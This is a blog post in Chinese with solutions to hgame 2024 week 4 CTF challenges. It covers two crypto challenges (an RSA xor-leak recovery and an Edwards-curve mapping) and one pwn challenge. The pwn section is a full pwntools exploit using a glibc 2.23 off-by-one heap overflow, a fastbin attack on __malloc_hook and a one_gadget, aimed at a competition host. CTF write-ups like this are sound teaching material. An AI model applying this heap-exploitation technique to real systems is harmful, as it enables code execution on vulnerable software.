[hgame 2024 week4] crypto/pwn

于 2024-03-01 19:39:13 发布
阅读量620 收藏 8
点赞数 9
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/136404146
版权

第四周有点凑数了吧,只有两个密码一个pwn

crypto/lastRSA

RSA题,泄露leak0=p^(q>>13)其实还是个异或的题,不过leak0没有直接给,而是给了两个式子:

enc1 = 2024+sum([(leak0+2t)**i for i in range(40)]);leak1 = 2024+sum([(leak0*2*t)**i for i in range(40)])

from Crypto.Util.number import *
from secret import flag

def encrypt(P,k,leak0):
    round=40
    t=114514
    x= leak0+2*t if k==1 else 2*t*leak0
    enc=2024
    while(round):
        enc+=pow(x,round,P)
        round-=1
    return enc

m=bytes_to_long(flag)
p=getStrongPrime(512)
q=getStrongPrime(512)
assert len(bin(p)[2:])==512 and len(bin(q)[2:])==512
e=0x10001
leak0=p^(q>>13)
n=p*q
enc1=encrypt(n,1,leak0)
enc2=encrypt(n,0,leak0)
c=pow(m,e,n)

print(f"enc1={enc1}")
print(f"enc2={enc2}")
print(f"c={c}")
print(f"n={n}")


enc1=2481998981478152169164378674194911111475668734496914731682204172873045273889232856266140236518231314247189371709204253066552650323964534117750428068488816244218804456399611481184330258906749484831445348350172666468738790766815099309565494384945826796034182837505953580660530809234341340618365003203562639721024   
enc2=2892413486487317168909532087203213279451225676278514499452279887449096190436834627119161155437012153025493797437822039637248773941097619806471091066094500182219982742574131816371999183859939231601667171386686480639682179794271743863617494759526428080527698539121555583797116049103918578087014860597240690299394   
c=87077759878060225287052106938097622158896106278756852778571684429767457761148474369973882278847307769690207029595557915248044823659812747567906459417733553420521047767697402135115530660537769991893832879721828034794560921646691417429690920199537846426396918932533649132260605985848584545112232670451169040592        
n=136159501395608246592433283541763642196295827652290287729738751327141687762873360488671062583851846628664067117347340297084457474032286451582225574885517757497232577841944028986878525656103449482492190400477852995620473233002547925192690737520592206832895895025277841872025718478827192193010765543046480481871

前边用过half-gcd挺好用,还可以用它来处理

def HGCD(a, b):
    if 2 * b.degree() <= a.degree() or a.degree() == 1:
        return 1, 0, 0, 1
    m = a.degree() // 2
    a_top, a_bot = a.quo_rem(x^m)
    b_top, b_bot = b.quo_rem(x^m)
    R00, R01, R10, R11 = HGCD(a_top, b_top)
    c = R00 * a + R01 * b
    d = R10 * a + R11 * b
    q, e = c.quo_rem(d)
    d_top, d_bot = d.quo_rem(x^(m // 2))
    e_top, e_bot = e.quo_rem(x^(m // 2))
    S00, S01, S10, S11 = HGCD(d_top, e_top)
    RET00 = S01 * R00 + (S00 - q * S01) * R10
    RET01 = S01 * R01 + (S00 - q * S01) * R11
    RET10 = S11 * R00 + (S10 - q * S11) * R10
    RET11 = S11 * R01 + (S10 - q * S11) * R11
    return RET00, RET01, RET10, RET11
    
def GCD(a, b):
    print(a.degree(), b.degree())
    q, r = a.quo_rem(b)
    if r == 0:
        return b
    R00, R01, R10, R11 = HGCD(a, b)
    c = R00 * a + R01 * b
    d = R10 * a + R11 * b
    if d == 0:
        return c.monic()
    q, r = c.quo_rem(d)
    if r == 0:
        return d
    return GCD(d, r)

R.<x> = PolynomialRing(Zmod(n))
f1 = 2024 - enc1 
f2 = 2024 - enc2 
round = 40
t = 114514
while round:
    f1 += (x+2*t)^round
    f2 += (x*2*t)^round 
    round -=1 

res = GCD(f1,f2)
#28393836724335847406168052814976215060399242861827153552938236205089198916166528481100104530682246199141916591570629704088736305620999506131274301622361617976022832290062433571111462778545024922816992931277078614259243378951336783503642137346321436986637570556289645880954074511024998016524574105232777874805*x + 120632369046464979337007116468860969996455300258370533226998068511279455859669092886318838843786805055292593205873249745062007838214676151227222096195178561205347558947214860070654611046274320182948148041334819353126761665121503104776690848826835227902147652138484673364067729149954700848676864573412031788032

leak0 = 13168452015078389807681744077701012683188749953280204324570483361963541298704796389757190180549802771265899020301416729606658667351017116721327316272373584

然后再爆破,p^q的程序基本不需要动,只是改下位数和p头

gift = leak0 
N = n 

PR.<x> = PolynomialRing(Zmod(N))
ok = False
def pq_xor(tp,tq,idx):
    global ok 
    
    if ok:
        return 
    if tp*tq>N:
        return 
    if (tp+(2<<idx))*(tq+(2<<(idx+13)))<N:
        return 
        
    if idx<=100:
        try:
            f = tp + x 
            rr = f.monic().small_roots(X=2^100, beta=0.4)
            if rr != []:
                print(rr)
                print(tp)
                print('p = ',f(rr[0]))
                ok = True
                return
        except:
            pass
        
        return
    
    idx -=1
    b = (gift >>idx)&1
    one = 1<<idx 
    oneq = 1<<(idx+13)
    if b==0:
        pq_xor(tp,tq,idx)    
        pq_xor(tp+one,tq+oneq,idx)    
    else:   #1
        pq_xor(tp+one,tq,idx)
        pq_xor(tp,tq+oneq,idx)

tq = 1<<511
tp = ((leak0>>499)^1)<<499
pq_xor(tp,tq,498)

p =  13167244882304693277785720567493996610066918256369682594482416913362069704726831109204371100970154866396462315730687841430922916219416627940866383413192931
q = n//p 
m = pow(c,inverse_mod(0x10001, (p-1)*(q-1)),n)
long_to_bytes(int(m))
#hgame{Gr0bn3r_ba3ic_0ften_w0rk3_w0nd3rs}

crypto/transfermation

这个跟前边的sictf的一个题几乎一样,都是爱得华兹曲线在1的情况下与椭圆曲线映射的问题,只是这个题最后还需要映射爱德华兹曲线上。

from Crypto.Util.number import *
from secret import Curve,gx,gy

# flag = "hgame{" + hex(gx+gy)[2:] + "}"

def ison(C, P):
    c, d, p = C
    u, v = P
    return (u**2 + v**2 - c**2 * (1 + d * u**2*v**2)) % p == 0

def add(C, P, Q):
    c, d, p = C
    u1, v1 = P
    u2, v2 = Q
    assert ison(C, P) and ison(C, Q)
    u3 = (u1 * v2 + v1 * u2) * inverse(c * (1 + d * u1 * u2 * v1 * v2), p) % p
    v3 = (v1 * v2 - u1 * u2) * inverse(c * (1 - d * u1 * u2 * v1 * v2), p) % p
    return (int(u3), int(v3))

def mul(C, P, m):
    assert ison(C, P)
    c, d, p = C
    B = bin(m)[2:]
    l = len(B)
    u, v = P
    PP = (-u, v)
    O = add(C, P, PP)
    Q = O
    if m == 0:
        return O
    elif m == 1:
        return P
    else:
        for _ in range(l-1):
            P = add(C, P, P)
        m = m - 2**(l-1)
        Q, P = P, (u, v)
        return add(C, Q, mul(C, P, m))


c, d, p = Curve

G = (gx, gy)
P = (423323064726997230640834352892499067628999846, 44150133418579337991209313731867512059107422186218072084511769232282794765835)
Q = (1033433758780986378718784935633168786654735170, 2890573833121495534597689071280547153773878148499187840022524010636852499684)
S = (875772166783241503962848015336037891993605823, 51964088188556618695192753554835667051669568193048726314346516461990381874317)
T = (612403241107575741587390996773145537915088133, 64560350111660175566171189050923672010957086249856725096266944042789987443125)
assert ison(Curve, P) and ison(Curve, Q) and ison(Curve, G)
e = 0x10001
print(f"eG = {mul(Curve, G, e)}")

#eG = (40198712137747628410430624618331426343875490261805137714686326678112749070113, 65008030741966083441937593781739493959677657609550411222052299176801418887407)

解法套模板,先通过4个点求参数(与那个题一样,这里有c是两个值,在求出结果后分别试试)

#通过曲线上的4点求参数
P = (423323064726997230640834352892499067628999846, 44150133418579337991209313731867512059107422186218072084511769232282794765835)
Q = (1033433758780986378718784935633168786654735170, 2890573833121495534597689071280547153773878148499187840022524010636852499684)
S = (875772166783241503962848015336037891993605823, 51964088188556618695192753554835667051669568193048726314346516461990381874317)
T = (612403241107575741587390996773145537915088133, 64560350111660175566171189050923672010957086249856725096266944042789987443125)
PR.<c,d> = PolynomialRing(ZZ)
F = [v[0]^2 + v[1]^2 - c^2*(1+d*v[0]^2*v[1]^2) for v in [P,Q,S,T]]
res = ideal(F).groebner_basis()
#[c^2 + 55035035862773596757724513019504552123843780200057245245581766079309471393995, d + 59163782230252684822841652225303740075401079121772957375715728037523200623623, 67943764351073247630101943221474884302015437788242536572067548198498727238923]
p = 67943764351073247630101943221474884302015437788242536572067548198498727238923
d = -59163782230252684822841652225303740075401079121772957375715728037523200623623%p 
c2 = -55035035862773596757724513019504552123843780200057245245581766079309471393995%p 

PR.<x> = PolynomialRing(Zmod(p))
f = x^2 - c2 
f.roots()
#[(60799864652963819347231403856892915722262395658296749944775205023739430037843,  1), (7143899698109428282870539364581968579753042129945786627292343174759297201080,  1)]

先映射到椭圆曲线上求逆再代回爱曲线

c = 60799864652963819347231403856892915722262395658296749944775205023739430037843
#c = 7143899698109428282870539364581968579753042129945786627292343174759297201080

#映射到椭圆曲线
#part2 map to ECC
PR.<z> = PolynomialRing(Zmod(p))
aa = 1
dd = (d*c^4)%p
J = (2*(aa+dd)*inverse_mod(aa-dd,p))%p
K = (4*inverse_mod(aa-dd,p))%p
A = ((3-J^2)*inverse_mod(3*K^2,p))%p
B = ((2*J^3-9*J)*inverse_mod(27*K^3,p))%p

for i in  PR(z^3+A*z+B).roots():
    alpha = int(i[0])
    for j in PR(z^2-(3*alpha^2+A)).roots():
        s = int(j[0])
        s = inverse_mod(s, p)
        if J==alpha*3*s%p:
            Alpha = alpha
            S = s

def twist_to_weier(x,y):
    v = x*inverse_mod(c,p)%p
    w = y*inverse_mod(c,p)%p
    assert (aa*v^2+w^2)%p==(1+dd*v^2*w^2)%p
    s = (1+w)*inverse_mod(1-w,p)%p
    t = s*inverse_mod(v,p)%p
    assert (K*t^2)%p==(s^3+J*s^2+s)%p
    xW = (3*s+J) * inverse_mod(3*K, p) % p
    yW = t * inverse_mod(K, p) % p
    assert yW^2 % p == (xW^3+A*xW+B) % p
    return (xW,yW)
 
def weier_to_twist(x,y):
    xM=S*(x-Alpha)%p
    yM=S*y%p
    assert (K*yM^2)%p==(xM^3+J*xM^2+xM)%p
    xe = xM*inverse(yM,p)%p
    ye = (xM-1)*inverse(xM+1,p)%p
    assert (aa*xe^2+ye^2)%p==(1+dd*xe^2*ye^2)%p
    xq = xe*c%p
    yq = ye*c%p
    assert (a*xq^2+yq^2)%p==c^2*(1+d*xq^2*yq^2)%p
    return (xq,yq)
 
E = EllipticCurve(GF(p), [A, B])
EG = E(twist_to_weier(eG[0],eG[1]))
o = E.order()
d = inverse_mod(0x10001,o)
G = d*EG 
#G = (49338299923900164306056143014992557349642478113076310967105225637960726019403 : 3746395175077030354020488043970072705075875018302778769259157124252617333772 : 1)
#G = (35733349967727579207362409511868045188603684677107507326049720528422212540295 : 6262749945313057631927156406870959025196549376410411046740120315141730009195 : 1)
G = (49338299923900164306056143014992557349642478113076310967105225637960726019403,3746395175077030354020488043970072705075875018302778769259157124252617333772)
gx,gy = weier_to_twist(G[0],G[1])
"hgame{" + hex(gx+gy)[2:] + "}"
#hgame{755cdf67af575370c4b4e54cd0e7159cdaabd80909897634b00d4ed7bef5d957}
#hgame{5cd8f34105f97cc6470cf21cc5d0c1be280764b8a9f0e3e35542ac41ba2c17f2}

pwn/EldenRingFinal

libc2.23确实太老了

在read里有个off_by_one可以多读1字节,建块时有管理块0x20和数据块。可处理19次

先建两个0x20的free以后再建大点的块,让数据块都相邻,然后利用溢出的1字节改下一块的头,释放得到重叠块,然后就是fastbin attack在malloc_hook-0x23利用错位建块写one

from pwn import *

context(arch='amd64', log_level='debug')
elf = ELF('./vuln')
libc = ELF('./libc-2.23.so')

#p = process('./vuln')
p = remote('47.102.184.100', 30701)

def add(size, msg=b'A'):
    p.sendlineafter(b'>\n', b'3')
    p.sendlineafter(b'>\n', b'0') #page 0
    p.sendlineafter(b'size:\n>\n', str(size).encode()) #n
    p.sendafter(b"content:\n>\n", msg)

def free(idx):
    p.sendlineafter(b'>\n', b'4')
    p.sendlineafter(b'>\n', b'0') #page 0
    p.sendlineafter(b"which note_ID would you like to delete?\n>\n", str(idx).encode()) 

def add2(size, msg=b'A'):
    p.sendlineafter(b'>', b'3')
    p.sendlineafter(b'>', b'0') #page 0
    p.sendlineafter(b'size:\n>', str(size).encode()) #n
    p.sendafter(b"content:\n>", msg)

def free2(idx):
    p.sendlineafter(b'>', b'4')
    p.sendlineafter(b'>', b'0') #page 0
    p.sendlineafter(b"which note_ID would you like to delete?\n>", str(idx).encode()) 

#30 30 30 30 20 20 70 20
add(0x20)
add(0x20)
free(1)
free(2)

add(0x10)
add(0x10)
add(0x60, b'A'*0x18+p64(0x51)) #
add(0x10)

free(1)
add(0x18, b'A'*0x18 + p8(0x91)) #5 off_by_one修改2块头为0x91释放到unsort
free(3)
free(2)
add(0x10) #6  unsort 70 -> main_arena

free(5)
add(0x18, b'A'*0x18 + p8(0x41)) #7
free(6)
add(0x30, b'A'*0x18 + p64(0x71)+ p16(0x45dd)) #8

add(0x60) #9
add(0x60, b'\x00'*(3+0x30)+flat(0xfbad38c0,0,0,0)+p8(0)) #10
p.recv(0x40)
libc.address = u64(p.recv(8)) - 0x3c4600
print(f"{libc.address = :x}")

free2(7)
add2(0x18, b'A'*0x18+ p64(0x51)) #11
free2(8)
add2(0x40, b'B'*0x18+ p64(0x71)) #12
free2(9)
free2(12)
add2(0x40, b'C'*0x18+p64(0x71) + p64(libc.sym['__malloc_hook'] - 0x23)) #13
add2(0x60)

one = [0x45206, 0x4525a, 0xef9f4, 0xf0897 ]

add2(0x60, b'AAA'+ flat(0,0,libc.address+one[2]))

p.sendlineafter(b'>', b'3')
p.sendlineafter(b'>', b'0') #page 0
p.sendlineafter(b'size:\n>', b'88') #n

p.interactive()
#hgame{aea7c6da12f48638b75ccd128d67b169e6510ade}

石氏是时试
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
vm 比较经典的虚拟机的题目是南邮的cg-ctf的题目, 然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来, 后面那个hagem的题目中间有一个栈的结构,也是比较有感觉的虚拟机题目了 另外hgame已经结束:https://hgame.vidar.club/#/user/login?return=Challenge-List cg-ctf: https://cgctf.nuptsast.com/challenges#Re 题目文件:
HGAME 2024 WEEK2 Crypto WP
qq_41889600的博客
02-18 1036
HGAME WEEK2 2024 Crypto 个人WP
记ECC例题
Emmaaaaa's blog
07-30 970
简单入门级ECC例题 discrete_log() 普适性Pohlig_Hellman算法 Smart’s attack 概念题 多项式求根 求点公式 私钥求解
hgame-2022-week4
网安小菜鸡
02-07 412
misc取证
HGAME 2022 week4 (WOW)
weixin_53349587的博客
03-09 472
exe程序,32位,程序比较正常,就是运行错误之后会打开bilibili。。。 进入主函数进行分析: 通过分析可以发现,程序对输入进行关键加密运算是在第51-53行,奈何编程功底不好,分析了好久也写不出加密算法,最后没办法了,通过wp才知道原来是在第64-66行有相同的加密函数,我们只需随便输入32位的值,然后再在判断之前(memcmp函数执行之前)修改内存的值让其和已知的值相等即可,最后一直执行下去,就可以得到flag。 下断点,开始动调: 当eip执行到图中位置时,对Buf2的值进行修.
PWN-COMPETITION-HGAME2022-Week4
P1umH0的博客
02-18 415
PWN-COMPETITION-HGAME2022-Week4vector vector c++写的pwn,实现了vector,没有edit功能,新增了move功能 add或move时,如果输入的下标大于vector的size,vector会进行resize扩容 旧vector占用的chunk自动被free掉进入相应的bin,数据转移到新vector中 利用add时的vector扩容,free掉size大于0x410的chunk,使其进入unsorted bin,泄露libc 利用move时的vector扩
[hgame 2024 week3] crypto/pwn
weixin_52640415的博客
02-23 1006
多组低解密指数攻击,b = [m*t%p%(2^32+1) for t in A] 给出模(2^32+1)的余,libc-2.32 UAF largebinAttack 修改mp_ tcache_bins
【Hgame2024】#Week1 Crypto详细全解+部分Web
jayq1的博客
02-06 1750
HGame2024Week1,题解记录,对密码有一定的分析推荐阅读,其他方向写的比较基础,师傅们可以参考其他优质题解,有问题欢迎交流!
vm类型题目(3) hagem-week4-easy
lhk124的博客
10-12 206
111111
计组P1 单周期MIPS处理器
08-12
实验报告+项目 Verilog语言
Spring Boot原创歌曲分享平台.zip
08-12
该平台严格按照需求分析制作相关模块,并利用所学知识尽力完成,但是本人由于学识浅薄,无法真正做到让该程序可以投入市场使用,仅仅简单实现部分功能,希望日后还能改善。 本平台具有以下优点: 该平台具有较高的适用性,选用B/S结构,可以在绝大部分个人平台上使用该平台。 平台将用户权限进行划分,管理员和用户都能看到及操作的信息不一样,两者具备不同的操作权限。 该平台操作界面简单明了,大部分人都可以正常使用。 但也存在以下问题需要改进: 运行时窗口不能被刷新,可以改进。 平台过于简单,显示的信息有限。 不能添加多个管理员账号,如果可以则将利于发展原创歌曲分享规模,便于原创歌曲分享信息集中管理。 不能实时预约接待消息,容易被忽视,不利于管理员服务用户。
100天拿下Python - Day 16-20(附源码)
08-12
Python语言进阶 1.数据结构和算法 2.函数的使用方式 3.面向对象相关知识 4.迭代器和生成器 5.并发编程 文件类型:markdown文档
中国对世界各国商品贸易进出口数据2000-2022年.xlsx
08-12
特点:今年全新,手工精心整理,放心引用,数据来自权威,相对于其他人的控制变量数据准确很多,适合写论文做实证用 ,不会出现数据造假问题 适用对象:大学生,本科生,研究生小白可用,容易上手!!! 课程引用: 经济学,地理学,城市规划与城市研究,公共政策与管理,社会学,商业与管理 ## 数据指标说明 海关统计显示,2022年我国货物贸易进出口总值42.07万亿元,比2021年增长7.7%。其中,出口23.97万亿元,增长10.5%;进口18.1万亿元,增长4.3%。分季度看,一、二季度进出口总值分别超过9万亿元和10万亿元,三季度进出口总值增长至11.3万亿元,四季度进出口总值继续保持11万亿元的水平。从贸易方式看,一般贸易增长快、比重升。2022年,我国一般贸易进出口26.81万亿元,增长11.5%,占进出口总值的63.7%,较上年提升2.2个百分点。 进出口研究是目前经济管理类研究的热点问题,本数据可以研究中国对各国的多年进出口数据变化及趋势。 数据名称:中国对225个国家地区进出口面板数据 数据年份:2000-2022年 数据格式:EXCEL数据 数据来源:UN Comtra
集成电路设计的现状与未来.ppt
最新发布
08-12
集成电路设计的现状与未来.ppt集成电路设计的现状与未来.ppt集成电路设计的现状与未来.ppt集成电路设计的现状与未来.ppt集成电路设计的现状与未来.ppt集成电路设计的现状与未来.ppt
玻璃式集装箱活动房模型3D图纸 Solidworks设计.zip
08-12
玻璃式集装箱活动房模型3D图纸 Solidworks设计.zip
基于javaScript开发的鼠标移动阴影效果+源码+demo演示
08-12
基于javaScript开发的鼠标移动阴影效果+源码+demo演示 基于javaScript开发的鼠标移动阴影效果+源码+demo演示 基于javaScript开发的鼠标移动阴影效果+源码+demo演示 基于javaScript开发的鼠标移动阴影效果+源码+demo演示 基于javaScript开发的鼠标移动阴影效果+源码+demo演示 基于javaScript开发的鼠标移动阴影效果+源码+demo演示 基于javaScript开发的鼠标移动阴影效果+源码+demo演示 基于javaScript开发的鼠标移动阴影效果+源码+demo演示
超越记忆:模型泛化能力的深度解析
08-12
机器学习是人工智能的一个分支,它使计算机系统能够从数据中学习并做出决策或预测,而无需进行明确的编程。机器学习算法可以分析大量数据,识别模式和趋势,并根据这些模式做出预测或决策。它包括几种不同的方法,包括: 1. **监督学习**:算法从标记的训练数据中学习,以便对新的输入数据进行分类或预测。 2. **无监督学习**:算法尝试在没有标记的训练数据中找到模式或结构。 3. **半监督学习**:结合了监督学习和无监督学习的方法,使用少量标记数据和大量未标记数据。 4. **强化学习**:算法通过与环境交互来学习,目标是最大化某种累积奖励。 机器学习在许多领域都有应用,包括图像识别、自然语言处理、医疗诊断、股市分析、自动驾驶车辆等。随着技术的发展,机器学习正变得越来越重要,并在不断扩展其应用范围。
请你完善上面的代码 添加从E:\Desktop\2024hgame\week1\crypto\奇怪的图片\png_out文件夹里面获取图片的功能
02-04
以下是完善代码的示例,添加了从指定文件夹获取图片的功能: ```python import os from PIL import Image def get_images_from_folder(folder_path): images = [] for filename in os.listdir(folder_path): if filename.endswith(".png"): image_path = os.path.join(folder_path, filename) image = Image.open(image_path) images.append(image) return images # 指定文件夹路径 folder_path = "E:/Desktop/2024hgame/week1/crypto/奇怪的图片/png_out" # 获取文件夹中的图片 images = get_images_from_folder(folder_path) # 在代码中使用获取到的图片 # ... ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值